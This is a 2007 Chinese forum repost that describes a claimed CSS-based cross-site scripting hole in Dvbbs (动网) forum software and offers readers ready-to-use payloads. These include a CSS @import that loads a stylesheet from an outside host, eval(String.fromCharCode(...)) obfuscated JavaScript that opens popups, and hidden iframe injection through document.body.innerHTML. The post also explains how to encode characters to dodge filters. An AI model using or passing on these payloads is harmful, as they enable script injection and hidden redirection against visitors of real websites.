标题:
[转载]
貌似动网漏洞?动网css经过测试可以跨站
[打印本页]
作者:
stylehack
时间:
2007-4-1 00:03
标题:
貌似动网漏洞?动网css经过测试可以跨站
貌似动网漏洞?动网css经过测试可以跨站..好东西我Tom'fs 绝对拿出来的。
----------
具体的跨站方法给大家曰一下,要不然大家说我Tom'fs 不厚道:
选择“代码”方式,在其中输入以下代码:
<style type='text/css'>@import url(
http://www.zz.la/1.css);</style>
其中的@import 是CSS的自定义属性,url是要链接的CSS样式,
而
http://www.zz.la/1.css
的内容如下:
<style type="text/css">
<!--
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
-->
</style>
这是一段弹出alert窗口的代码,其中的string.formcharcode是用来将字符转为asc值的函数。
OPEN 的代码如下:
@import url(javascript:eval(String.fromCharCode(111,112,101,110,40,39,104,116,116,112,58,47,47,119,119,119,46,110,111,104,97,99,107,46,99,110,39,44,39,-17702,-16435,-13610,-19743,39,44,39,119,105,100,116,104,61,50,48,48,44,104,101,105,103,104,116,61,50,48,48,39,41,59)));
如果是要在当前窗口隐藏显示,可用document.body.innerHTML方法
代码是:
document.body.innerHTML=document.body.innerHTML+"<iframe frameborder=0 width=200 height=200 scrolling=no src=http://www.zz.la></iframe>";
将以上的字符用 asc转换工具转为asc值,放入string.fromcharcode函数中,就可以了,当然,也可以不用string.fromcharcode函数,直接引入代码的语句是:
@import url(javascript:eval("document.body.innerHTML=document.body.innerHTML+'<iframe frameborder=0 width=200 height=200 scrolling=no src=http://www.zz.la></iframe>';"));
其中字符要用双引号引入才行,如果再去掉eval,那么语句就是:
@import url(javascript:document.body.innerHTML=document.body.innerHTML+"<iframe frameborder=0 width=200 height=200 scrolling=no src=http://www.zz.la></iframe>");
常量用双引号引入,而变量则直接引入,两者之间用+来连接,如果有特殊的字符,则可用String.fromCharCode进行转换,比如"<",则可用String.fromCharCode(60)代替。
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2
